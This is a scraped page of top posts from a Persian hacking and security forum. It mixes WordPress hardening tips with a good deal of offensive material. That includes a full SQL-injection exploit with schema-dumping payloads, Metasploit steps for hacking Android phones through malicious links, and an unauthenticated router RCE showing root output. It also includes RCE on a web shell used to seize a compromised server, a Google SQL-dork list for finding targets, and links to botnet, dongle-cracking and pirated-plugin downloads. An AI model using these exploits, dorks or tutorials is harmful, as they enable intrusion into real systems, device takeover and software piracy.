رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

تخته امتیازات


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان ۲۱/۰۸/۱۴ در همه بخش ها

  1. 4 امتیاز
    با سلام، موضوع حفظ امنیت وردپرس و تلاش برای بالابردن آن یک مسئله بسیار ضروری است. چون در صورتی که هکرها بتوانند وب سایت شما را هک کنند، نه تنها به دارایی شما که اطلاعات روی سایتتان است دسترسی پیدا خواهند کرد، بلکه به اعتبار و برند شما نیز لطمه وارد خواهند کرد. کافی است افراد بدانند که سایت شما یک بار مورد حمله هکرها واقع شده است، امکان دارد برای خرید کردن یا دریافت سایر انواع خدمات دیگر به شما اعتماد نکنند. اگر سایت شما یکی از دارایی‌های با ارزشتان محسوب می‌شود، پس باید امنیت سایت وردپرس شما نیز برایتان در اولویت باشد. در این مطلب که به آموزش افزایش امنیت وردپرس می‌پردازد ما چند راهکار ساده و عملی به شما خواهیم نشان خواهیم داد که برای تأمین امنیت وردپرس خود از آن‌ها استفاده کنید.
  2. 4 امتیاز
    نصب یک افزونه امنیتی وردپرس بعد از تهیه منظم نسخه پشتیبان، نصب یک افزونه امنیتی وردپرسی است که در افزایش امنیت وردپرس نقش دارد. افزونه امنیتی در واقع یک سیستم حسابرسی و نظارت است که همه اتفاقاتی که در وب سایت شما می‌افتد را پیگیری می‌کند. این موضوع شامل نظارت بر یکپارچگی فایل‌ها، تلاش ناموفق برای ورود به سیستم ، اسکن بدافزار و غیره می‌شود. ما در این تاپیک چند نمونه از آخرین آپدیت پلاگین های امنیتی پرو را در اختیارتون میزاریم و با توجه به نیاز خودتان پلاگین مورد نظر را نصب کنید. پیشنهاد ما پلاگین امنیتی iThemes Security می باشد. wordfence-v7.5.11 (Iran Cyber).zip hide-my-wp-6.0.22 (Iran Cyber).zip ithemes-security-pro7.1.3 (Iran Cyber).zip
  3. 4 امتیاز
    تهیه منظم نسخه پشتیبان را فراموش نکنید پشتیبان گیری اولین دفاع شما در برابر هرگونه حمله وردپرس است. به یاد داشته باشید، هیچ چیز 100٪ امن نیست. اگر وب سایت های دولتی قابل هک باشند، وب سایت های شما نیز می توانند مورد حمله قرار بگیرند. در صورت بروز اتفاقات بد، پشتیبان گیری به شما امکان می دهد که به سرعت سایت وردپرس خود را بازیابی کنید. افزونه های پشتیبان وردپرس رایگان و پولی زیادی وجود دارد که می توانید از آن ها استفاده کنید. مهم ترین نکته ای که در مورد تهیه نسخه پشتیبان باید بدانید این است که شما باید به طور منظم پشتیبان گیری از سایت کامل را در یک مکان از راه دور (نه حساب میزبانی خود) ذخیره کنید. توصیه می کنیم آن را در سرویس ابری مانند آمازون، Dropbox یا ابرهای خصوصی مانند Stash ذخیره کنید. براساس تعداد دفعات به روزرسانی وب سایت خود، تنظیمات ایده آل ممکن است یک بار در روز یا پشتیبان گیری ریل تایم انجام شود. خوشبختانه این کار با استفاده از افزونه هایی مانند افزونه UpdraftPlus به راحتی قابل انجام است که ما در این تاپیک آخرین ورژن پرو (2.22.14.25) این افزونه را در اختیارتون قرار میدیم. updraftplus 2.22.14.25 (Iran Cyber).zip
  4. 4 امتیاز
    نقش هاست وردپرس را خیلی جدی بگیرید سرویس میزبانی وردپرس شما مهم ترین نقش را در امنیت سایت وردپرسی شما دارد. یک ارائه دهنده میزبانی مناسب اقدامات اضافی را برای محافظت از سرورهای خود در برابر تهدیدات معمول انجام می دهد. در اینجا نحوه کار یک شرکت میزبان وب خوب در پس زمینه برای محافظت از وب سایت ها و داده های شما ارائه شده است: آن ها به طور مداوم شبکه خود را از نظر فعالیت مشکوک کنترل می کنند. همه شرکت های میزبان خوب ابزارهایی برای جلوگیری از حملات گسترده DDOS در اختیار دارند. آن ها نرم افزار سرور، نسخه های php و سخت افزار خود را به روز نگه می دارند تا از سوءاستفاده آسیب پذیری های امنیتی در نسخه قدیمی توسط هکرها جلوگیری کنند. آن ها آماده استفاده از نقشه های بازیابی حوادث هستند که به آن ها این امکان را می دهد که از داده های شما در صورت تصادف بزرگ محافظت کنند. در یک برنامه میزبانی مشترک، شما منابع سرور را با بسیاری از مشتریان دیگر به اشتراک می گذارید. این در صورتی که هکر بتواند از یک سایت همسایه برای حمله به وب سایت شما استفاده کند خطر آلودگی بین سایت را باز می کند. استفاده از سرویس میزبانی وردپرس مدیریت شده بستر ایمن تری را برای وب سایت شما فراهم می کند. شرکت های مدیریت شده میزبان وردپرس پشتیبان گیری خودکار، به روزرسانی خودکار وردپرس و پیکربندی های امنیتی پیشرفته تری را برای محافظت از وب سایت شما ارائه می دهند.
  5. 4 امتیاز
    وردپرس خود را به روز نگه دارید وردپرس یک نرم افزار منبع باز است که به طور منظم نگهداری و به روز می شود. به طور پیش فرض، وردپرس به طور خودکار به روزرسانی های جزئی را نصب می کند اما شما برای نسخه های اصلی، شما باید به صورت دستی آن را به روز کنید. وردپرس همچنین دارای هزاران افزونه و قالب است که می توانید بر روی وب سایت خود آن را نصب کنید. این افزونه ها و قالب ها توسط توسعه دهندگان شخص ثالث که مرتباً نیز آن را به روزرسانی می کنند، نگهداری می شود. این به روزرسانی های وردپرس برای امنیت و ثبات سایت وردپرسی شما بسیار مهم است. شما باید اطمینان حاصل کنید که هسته وردپرس، افزونه ها و موضوع وردپرس شما به روز باشد. بروز رسانی موجب می‌شود تا افزونه‏‌هایی که با نسخه جدید هم‌خوانی ندارند نیز، مجبور به بروز رسانی خود شوند. در هر بروز رسانی وردپرس و افزونه‏‌ها تلاش شده است تا آخرین روزنه‏‌های ورود از طریق هسته مرکزی وردپرس بسته شود و افزونه‏‌های امن‌تری برای کاربران تهیه شود. این یک گزینه مهم در حفظ امنیت وردپرس است.
  6. 3 امتیاز
    نام کاربری و رمز عبور بسیار قوی و پیچیده انتخاب کنید رایج ترین تلاش های هک وردپرس از رمزهای عبور سرقت شده استفاده می کند. با استفاده از رمزهای عبور قوی تر که برای وب سایت شما منحصر به فرد هستند، می توانید این کار را دشوارتر کنید. نه فقط برای مدیریت وردپرس، همچنین برای حساب هایFTP، پایگاه داده، حساب میزبانی وردپرس و آدرس های ایمیل سفارشی شده که از نام دامنه سایت شما استفاده می کنند. بسیاری از مبتدیان استفاده از رمزهای عبور قوی را دوست ندارند زیرا آن ها به سختی به خاطر سپرده می شوند. یکی از مزایای این مورد این است که دیگر نیازی به یادآوری رمزهای عبور نیست و می توانید از مدیریت رمز عبور استفاده کنید. راه دیگر برای کاهش خطر امنیتی این است که به هرکسی اجازه دسترسی به حساب مدیر وردپرس را ندهید، مگر اینکه مجبور شوید. اگر یک تیم بزرگ از نویسنده مهمان دارید، قبل از افزودن حساب های کاربری و نویسندگان جدید به سایت وردپرس خود، مطمئن شوید که نقش ها و قابلیت های کاربر را در وردپرس درک کرده اید.
  7. 3 امتیاز
    سلامت خدمت همه ی دوستان همکاران عزیزان مدتی بود واقعا کم کار شدیم یکم انرژی انگیزه ها کم شده بود و تایم کاری هم اجازه فعالیت مستمر رو نمیداد 😟 الان در خدمتتون هستیم قراره در این تاپیک بصورت جامع آخرین ابزار های باگ بانتی در 2021-2020 در اختیار بچه ای گل ایران سایبر❤️ قرار دهیم توجه :این تاپیک جای پرس و پاسخ نیست اگر سوالی داشتید تایپک جدا ایجاد کنید برای سوال و جواب در آخر اگر ابزاری میدونستید جای خالی این توی تاپیک داره معرفی کنید یا خودتون بصورت پست قرار دهید ابزار پیوست کنید در انجمن
  8. 3 امتیاز
    با سلام. خیلی هم عالی و خیلی هم خوبه که دوباره قراره اینقدر اکتیو بشید: یک تجربه ای که داشتم اینه که از ابزارهایی که همه از آون ها استفاده می‎‌کنند شما استفاده نکنید. ابزارهای خیلی زیادی موجود هستش که کاراییشون خیلی بهتر از بقیه چیزا هستش ولی خوب گمنام هستن. بیشتر دنبال اونا باشید و اون ها رو تست کنید و تجزیه تحلیل کنید سر نخ های خوبی به دست میارید. برای شروع می تونید این ابزارهایی که برای ارزیابی امنیتی هستش رو تست کنید: https://github.com/topics/vulnerability-assessment
  9. 3 امتیاز
    به نام خداوند بخشنده مهربان سلام و خسته نباشید خدمت دوستان عزیز همینطوری که اطلاع دارید یک آسیب پذیری هسته وردپرس با شناسه و عنوان " CVE-2022-21661 : WordPress Core - SQL Injection " که در نسخه 5.8.2 قابلیت بهره برداری داشت به ثبت رسید و در نسخه 5.8.3 - Patch شد هسته وردپرس به دلیل راحتی به توسعه‌دهندگان اجازه میده تا پلاگین‌ها و تم‌هایی بسازن تا وب‌سایت‌ های خودشون رو مدیریت کنن ، توابعی را برای پلاگین/ موضوع برای فراخوانی و استفاده از توابعی که وردپرس ارائه کرده مثل : فرمت داده ، پرس و جو Database رو فراهم میکنه در بین کلاس هایی که wordpress ارائه کرده یک خطای SQL Injection را در کلاسی که WP برای پرس و جو از DB ارائه میده پیدا شده به نام : WP_Query تابع clean_query از get_sql_for_clause فراخوانی میشه با خوندن کد تابع مشاهده میکنیم وظیفه این تابع ایجاد بند برای شرط در یک پرس و جو SQL و به طور خاص وظیفش پردازش داده های دریافتی، ترکیب داده ها به یه شرط در پرس و جو SQL هست. بنابراین میتونیم داده های برگشتی این تابع رو کنترل کنیم . به این معنی که می‌تونیم کوئری SQL رو کنترل کنیم و SQL Injection انجام بدیم. - برای خوندن جزئیات بیشتر و پارامتر ها به لینک هایی که در آخر نوشته قرار میدم مراجعه کنید . CVE-2022-21661 : Exploit WordPress Core 5.8.2 - SQL Injection [+] 🕷️ اکسپلویت این آسیب پذیری برای اولین بار توسط بنده به ثبت رسید و شما میتونید با لینک های زیر بهش دسترسی داشته باشید : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661 https://nvd.nist.gov/vuln/detail/CVE-2022-21661 https://www.cvedetails.com/cve/CVE-2022-21661/ https://packetstormsecurity.com/files/165540/WordPress-Core-5.8.2-SQL-Injection.html https://www.exploit-db.com/exploits/50663 https://cxsecurity.com/issue/WLB-2022010068 https://0day.today/exploit/37226 نویسنده : آرین چهرقانی | Aryan Chehreghani امیدوارم که لذت برده باشید دوستان عزیزم 🌹 "با تشکر از گروه امنیتی ایران سایبر"
  10. 3 امتیاز
    سلام دوستان آرین چهرقانی هستم امروز با تحلیل آسیب پذیری Remote Code Execution از شل آلفا ( Tesla v4.1 ) درخدمت شما دوستان عزیز هستم. خب ، ما یه دوستی داشتیم که برامون یه شل از یه سروری فرستاد تا روش کار کنیم و تست بزنیم ... متاسفانه هیچ رمزی روی شل نبود و بعد از یکی دو روز که گذشت یا این دوست ما یا هرکسی دیگه ای اومد و رمز گذاشت روی شل و دسترسی ما رو یه جورایی قطع کرد ، درواقع شل خودش رو اپلود کرد و هیچ بکدوری هم درکار نبود. من برام قابل قبول نبود که یکی از در بیاد و دسترسی رو ازم بگیره ، برای همین رفتم سراغ شل دوست داشتنی و معروف آلفا تا یکمی هم انالیز کنم کداش رو هم اینکه یه راهی برای دور زدن رمز یا یه همچین چیزی پیدا کنم ، ( جدا از این بحث باید یادآور باشم ، این شل امسال توسط دوست عزیزم آقا سجاد مدیر کانال بیسکویت پدر | Biskooit Pedar دیکد شد و پخش شد ) خب دوستان ما توی ورژن های قبلی و ورژن جدید شل یک دایرکتوری رو مشاهده میکنیم با نام : ALFA_DATA البته تو ورژن های قبلی یا نبود یا یک اسم دیگه ای داشت ، داخل این دایرکتوری یک دایکتوری دیگه ای به نام alfacgiapi وجود داره و معمولا سه تا فایل داخلش قرار میگیره با نام های : bash.alfa & perl.alfa & py.alfa و این 3 فایل آسیب پذیر هستند . داخل این فایل ها با متد POST یک پارامتری با نام CMD گرفته شده که ورودی تبدیل شده از base64 رو دیکد میکنه و میره سمت سرور میخونه دستور رو ، و اونم به ما توی صفحه خروجی خودش رو برمیگردونه . ALFA TEAM SHELL TESLA 4.1 - Remote Code Execution (Unauthenticated) خب همینطور که تو تصویر مشاهده میکنید ما تونستیم دستورات خودمون رو به راحتی اجرا کنیم و شل خودمون اپلود کنیم. در نهایت هم اینو ثبت کردم که شما میتونید با این لینک بهش دسترسی داشته باشید : https://cxsecurity.com/issue/WLB-2021120083 امیدوارم که لذت برده باشید دوستان عزیزم 🌹 "با تشکر از گروه امنیتی ایران سایبر"
  11. 3 امتیاز
    فیلم آموزش ساخت بات نت به صورت کامل فقط لایک کامنتیادتون نره از ما حمایت کنید https://mega.nz/file/rJoDhSRC#IEHfyiINMTY2myrNcqkIO-bqUi7ndofLCn1DwtI38iI
  12. 3 امتیاز
    سلام خدمت دوستان عزیز، خیلی از دوستان براشون سوال پیش اومده که دسترسی گرفتن از دستگاه اندروید(تارگت)خارج از شبکه ممکن است یا نه؟ در جواب این سوال باید بگم میشه از دستگاه اندرویدی خارج از شبکه محلی خودمون دسترسی کامل بگیریم. برای این کار تنها نیاز به نصب سرویس ngrok بسته به سیستم عامل خودتون دارید. با نصب این سیستم دیگه نیازی به پورت فورواردینگ و این داستانا ندارید. برای نصب این سرویس،باید به سایت ngrok.com مراجعه کنید و طبق نوع سیستم عامل خودتون دانلود کنید. بعد از ثبت نام در این سایت به شما یک کلید فعال سازی میده که میتونید با اون کلید ngrok رو فعال کنید. اگه حمایت کنید از این پست حتما نحوه کار و راه اندازی کامل این سیستم رو بهتون میگم.😁
  13. 3 امتیاز
    آسیب پذیری Remote Code Execution کشف شده از روتر های Seowon 130-SLC که توسط ( مبین نت | mobinet ) داره استفاده میشه این دفعه یه جور دیگه ای خودشو نشون داد ! در حال تست روتر بودم و متوجه شدم که بدون احراز هویت روی یکی از پارامتر های دیتای ارسالی ("queriesCnt" ) میشه دستوراتی رو وارد کرد و پاسخ رو با قالب xml در مروگر بدون احراز هویت ( admin ) دریافت کرد ! ارسال درخواست به سمت ip هدف و دریافت خروجی xml در مروگر همینطور که تو عکس بالا مشاهده میکنید من ip و port یکی از روتر ها رو اوردم و با متد Post این دیتا رو ارسال کردم و سمت چپ عکس ، هدف به من خروجی داده <xml> <log>uid=0(root) gid=0(root) </log></xml> در نهایت هم اینو ثبت کردم که شما میتونید با این لینک بهش دسترسی داشته باشید : https://www.exploit-db.com/exploits/50295 شناسه هایی با عنوان دسترسی ریموت برای این روتر ها ثبت شده که در دسترس هستند : https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-17456 امیدوارم که لذت برده باشید دوستان عزیزم 🌹 "با تشکر از گروه امنیتی ایران سایبر" نویسنده : آرین چهرقانی | Aryan Chehreghani
  14. 3 امتیاز
    بانک میزنیم Ruiner-iran-cyber.zip
  15. 3 امتیاز
    با سلام خدمت دوستان عزیز. یکی از راه هایی که که برای محاظت از نرم افزار انجام میدن استفاده از دانگل ها هستش.😒 تو این مجموعه سری آموزش با نحوه کرک کردن انواع دانگل های سخت افزاری آشنا میشید.😬 لینک دانلود: https://mega.nz/file/kypjyRja#F4D4T183WeyEG2_bu_nI_bfu3P7DoW-k55XdEvlYWeA رمز فایل: [email protected] موفق و سر بلند باشید 💚
  16. 2 امتیاز
    همه دوستان عزیز من از ایران مهاجرت کردم در حال حاضر امکان پرداخت از طرف شما وجود نداره. سلاطین کرک در ایران هستند از اونها کمک بگیرید تا جایی که من اطلاع دارم در حال حاضر وضعیت کرک انواع قفل به اینصورته: این قفل ها توسط اهوازهکرز کرک می شوند قفل صدف قفل لاوین قفل ایمن گستر نوین vividvisual این قفل ها توسط بایولاک کرک می شوند: اسپات پلیر Vmprotect Themida Thundersoft (gem video file) password protect video master در ضمن قفل خود بایولاک هم بصورت مشترک با یک شرکت آلمانی در حال برند شدن و دریافت لایسنس بین المللی می باشد و در حال جایگزین شدن بجای قفل Denovo در بازی ها می باشد یعنی در آینده قفل بازی های جهانی یک قفل ایرانی خواهد بود
  17. 2 امتیاز
    هش بصورت md5 همراه با سالت میباشد . الگوریتم هش md5 salt برای کرک هم باید سالت هم داشته باشید
  18. 2 امتیاز
    سلام پست شما خلاف قوانین انجمن هست این رو که خداروشکر کاملا آگاه هستید لیست ایمیل در اوردن کار زیاد سختی نیست هیچ چیزی به راحتی به دست نمیاد شما خودتون تلاش کوشش کنید به نتیجه برسید اگر سوالی در زمینه پن تست امنیت داشتید در خدمتیم باشد که رستگار شویم 🙄 تامام
  19. 2 امتیاز
    دوره آموزش SQL Injection PayPal/Credit Card/Debit Card # Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection # Dork: N/A # Date: 2018-10-29 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/users/janobe # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-18800 # POC: # 1) # http://localhost/[PATH]/index.php?p=accomodation&q=[SQL] # #[PATH]/accomodation.php #... #50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "' AND `NUMPERSON` = " . $_POST['person']; #51 #52 #53 }elseif(isset($_GET['q'])){ #54 #55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "'"; #56 #57 #58 #59 } #60 #61 $accomodation = ' | ' . $_GET['q']; #62 ?> #... GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 Connection: keep-alive HTTP/1.1 200 OK Date: Sun, 28 Oct 2018 19:55:17 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/index.php?p=rooms&q=[SQL] # #[PATH]/room_rates.php #... #50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `NUMPERSON` = " . $_POST['person']; #51 #52 #53 }elseif(isset($_GET['q'])){ #54 #55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ROOM` LIKE '%" . $_GET['q'] . "%'"; #56 #57 #58 }else{ #59 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID`"; #60 } #61 #62 $accomodation = ' | ' . @$_GET['q']; #63 ?> #... GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 Connection: keep-alive HTTP/1.1 200 OK Date: Sun, 28 Oct 2018 19:58:47 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 3) # http://localhost/[PATH]/admin/login.php # #[PATH]/admin/login.php #... #58 if (isset($_POST['btnlogin'])) { #59 //form has been submitted1 #60 #61 $uname = trim($_POST['email']); #62 $upass = trim($_POST['pass']); #...
  20. 2 امتیاز
    مهندس جان، یک کرکر نمیتونه یه چیز جدید خلق کنه و معجزه انجام بده منظورم اینه که قفل صدف کرک شده، قفل یاقوت سرخ کرک شده، قفل اسپات پلیر کرک شده، قفل ایمن گستر نوین کرک شده، قفل لاوین کرک شده اما همه این قفل ها را زمانی میتونیم کرک کنیم که همه فایل ها بطور کامل در اختیار کرکر قرار بگیره به نظر شما با یک عکس چه چیزی باید تحلیل شود!؟ چی باید الان کرک بشه؟ من چه جوابی باید به شما بدهم؟ مهندس همه اون چیزی که موسسه در اختیار شما قرار داده شما همون ها را در اختیار کرکر قرار بده تا مثل هلو بره تو گلو این قفل ها: قفل یاقوت سرخ، قفل صدف، قفل اسپات پلیر، قفل لاوین، قفل ایمن گستر نوین همشون قفل ریقو هستن چون برنامه نویساشون ریقو و کلاهبردار هستن البته این جمله برای همه قفل ها نیست لطفاً به برنامه نویسهای واقعی و زحمتکش برنخوره زیرا ما تو ایران هم قفلی داریم که کرک نمیشه و حتی در دنیا هم کسی نمیتونه کرکش کنه چون برنامه نویس هاشون کار بلد هستند و ایرانی و نخبه واقعی هستند و قصدشون کلاهبرداری نیست پس شما هم اگه میخوای کمکت کنم باید همینی که گفتم را انجام بدی
  21. 2 امتیاز
    به نام خداوند بخشنده مهربان سلام و خسته نباشید خدمت دوستان عزیز ، آرین چهرقانی هستم امروز با بررسی آسیب پذیری " Cross-Origin Resource Sharing " از سایت مموری لیکس ما اینجا قصد داریم که بیایم یه توضیحی ابتدا راجب این آسیب پذیری بدیم ، بعدش بریم سراغ فیلم مربوط و تستی که گرفته شده و نتیجه ای که دریافت شده . برای سرعت بخشیدن در کارم از جاهای مختلفی متن ها رو کپی میکنم که هم شما روان تر بخونید هم من راحت تر باشم . آسیب پذیری CROS چیست : ( تعریف کلی ) آسیب پذیری CORS که مخفف عبارت Cross-origin resource sharing است یکی از اسیب پذیری های خطرناک است ، به این منظور که نفوذگر می‌تواند اطلاعات مختلف و حساس مانند session ها و خیلی اطلاعات حساس دیگر را به دست اورد؛ این اسیب پذیری که بر روی مبحث مرورگرهای مدرن اتفاق خواهد افتاد ارتباط زیادی با SOP ها دارد که در ادامه مبحث SOP را بررسی خواهیم کرد برنامه وب نمی تواند به درستی هدر مبدا را تأیید کند هدر Access-Control-Allow-Credentials: True را برمی گرداند.در این پیکربندی، هر وب‌سایتی می‌تواند درخواست‌هایی را که با اعتبار کاربر ارسال شده است صادر کند و پاسخ‌های این درخواست‌ها را بخواند. اعتماد به منابع دلخواه عملاً خط مشی مبدأ یکسان را غیرفعال می کند و امکان تعامل دو طرفه توسط وب سایت های شخص ثالث را فراهم می کند. * این توضیحات خیلی خلاصه هست شما میتونید با یه سرچ ساده کامل راجب این اسیب پذیری بخونید و یادش بگیرید ، مرورش کنید یا هرچی . * اگر فرصت شد بیشتر زوم میکنیم سر این آسیب پذیری یعنی در مطالب بعدی بیشتر راجبش صحبت میکنیم . خب ابتدا یک درخواست شیک و مجلسی میفرستم سمت سایت : curl https://memoryleaks.ir/wp-json -H "Origin: https://www.google.com" -I اینجا اون چیزایی که ما میخوایم رو بهمون میده ؛ اون چیزا چی هستن ؟ Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE Access-Control-Allow-Credentials: true اینجا اومده و ریسپانس Access-Control-Allow-Credentials رو برای ما مقدار : True قرار داده یعنی چی ؟ یعنی اینکه سایت سایت مورد نظر بنده آسیب پذیری CROS رو داره . حالا میشه اکسپلویتش کرد و... ولی من فقط خواستم گزارش بدم که برخورد طرف مقابلم نادرست بود ... فیلم رو هم بارگذاری میکنم اینجا میتونید ببنید ( پیوست میشه - به بخش دریافت مراجعه کنید )
  22. 2 امتیاز
    سلام خدمت اساتید و دوستان گرامی، در این آموزش قصد داریم دستگاه اندرویدی را با فرستادن لینک آلوده هک کنیم. این روش برای دستگاه های اندرویدی(5 و 5.5) جواب میده. خب بریم سراغ دستورات: 1. دستور اول اکسپلویت خودمونو میسازیم: use exploit/android/browser/webview_addjavascriptinterface 2. با دستورات زیر آپشن های مورد نظر را ست میکنیم: show options set SRVHOST set SRVHOST xxx.xxx.x.x set URIPATH / set LHOST xxx.xxx.x.x set LPORT 8080 3. با دستور زیر اکسپلویت را ران میکنیم: run بعد از وارد کردن دستورات بالا،اکسپلویت ما با هاست و پورتی که مشخص کردیم،ست میشود. با این روش هم میتوان دستگاه های درون شبکه محلی را مورد نفوذ قرار داد هم دستگاه های خارج از شبکه محلی(روش هک دستگاه اندرویدی خارج از شبکه در تاپیک قبلی) * تارگت بعد از باز کردن لینک مخرب دسترسی را به ما میدهد. -- امیدوارم مفید واقع شده باشه 😊
  23. 2 امتیاز
    باسلام خدمت بزرگان Google SQL Dorks – 2021 Here is the collection of Here is the Latest collection of Google SQL Dorks List Collection for SQL Injection 2021 view_items.php?id= home.php?cat= item_book.php?CAT= www/index.php?page= schule/termine.php?view= goods_detail.php?data= storemanager/contents/item.php?page_code= view_items.php?id= customer/board.htm?mode= help/com_view.html?code= n_replyboard.php?typeboard= eng_board/view.php?T****= prev_results.php?prodID= bbs/view.php?no= gnu/?doc= zb/view.php?uid= global/product/product.php?gubun= m_view.php?ps_db= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= store/product.php?productid= products.php?cat= productList.php?cat= product_detail.php?product_id= product.php?pid= view_items.php?id= more_details.php?id= county-facts/diary/vcsgen.php?id= idlechat/message.php?id= podcast/item.php?pid= products.php?act= details.php?prodId= socsci/events/full_details.php?id= ourblog.php?categoryid= mall/more.php?ProdID= archive/get.php?message_id= review/review_form.php?item_id= english/publicproducts.php?groupid= news_and_notices.php?news_id= rounds-detail.php?id= gig.php?id= board/view.php?no= index.php?modus= news_item.php?id= rss.php?cat= products/product.php?id= details.php?ProdID= els_/product/product.php?id= store/description.php?iddesc= socsci/news_items/full_story.php?id= naboard/memo.php?bd= bookmark/mybook/bookmark.php?bookPageNo= board/board.html?table= kboard/kboard.php?board= order.asp?lotid= goboard/front/board_view.php?code= bbs/bbsView.php?id= boardView.php?bbs= eng/rgboard/view.php?&bbs_id= product/product.php?cate= content.php?p= page.php?module= ?pid= bookpage.php?id= cbmer/congres/page.php?LAN= content.php?id= news.php?ID= photogallery.php?id= index.php?id= product/product.php?product_no= nyheder.htm?show= book.php?ID= print.php?id= detail.php?id= book.php?id= content.php?PID= more_detail.php?id= content.php?id= view_items.php?id= view_author.php?id= main.php?id= english/fonction/print.php?id= magazines/adult_magazine_single_page.php?magid= product_details.php?prodid= magazines/adult_magazine_full_year.php?magid= products/card.php?prodID= catalog/product.php?cat_id= e_board/modifyform.html?code= community/calendar-event-fr.php?id= products.php?p= news.php?id= StoreRedirect.php?ID= subcategories.php?id= tek9.php? template.php?Action=Item&pid= topic.php?ID= tuangou.php?bookid= type.php?iType= updatebasket.php?bookid= updates.php?ID= view.php?cid= view_cart.php?title= view_detail.php?ID= viewcart.php?CartId= viewCart.php?userID= viewCat_h.php?idCategory= viewevent.php?EventID= viewitem.php?recor= viewPrd.php?idcategory= ViewProduct.php?misc= voteList.php?item_ID= whatsnew.php?idCategory= WsAncillary.php?ID= WsPages.php?ID=noticiasDetalle.php?xid= sitio/item.php?idcd= index.php?site= de/content.php?page_id= gallerysort.php?iid= docDetail.aspx?chnum= index.php?section= index.php?page= index.php?page= en/publications.php?id= events/detail.php?ID= forum/profile.php?id= media/pr.php?id= content.php?ID= cloudbank/detail.php?ID= pages.php?id= news.php?id= beitrag_D.php?id= content/index.php?id= index.php?i= ?action= index.php?page= beitrag_F.php?id= index.php?pageid= page.php?modul= detail.php?id= index.php?w= index.php?modus= news.php?id= news.php?id= aktuelles/meldungen-detail.php?id= item.php?id= obio/detail.php?id= page/de/produkte/produkte.php?prodID= packages_display.php?ref= shop/index.php?cPath= modules.php?bookid= 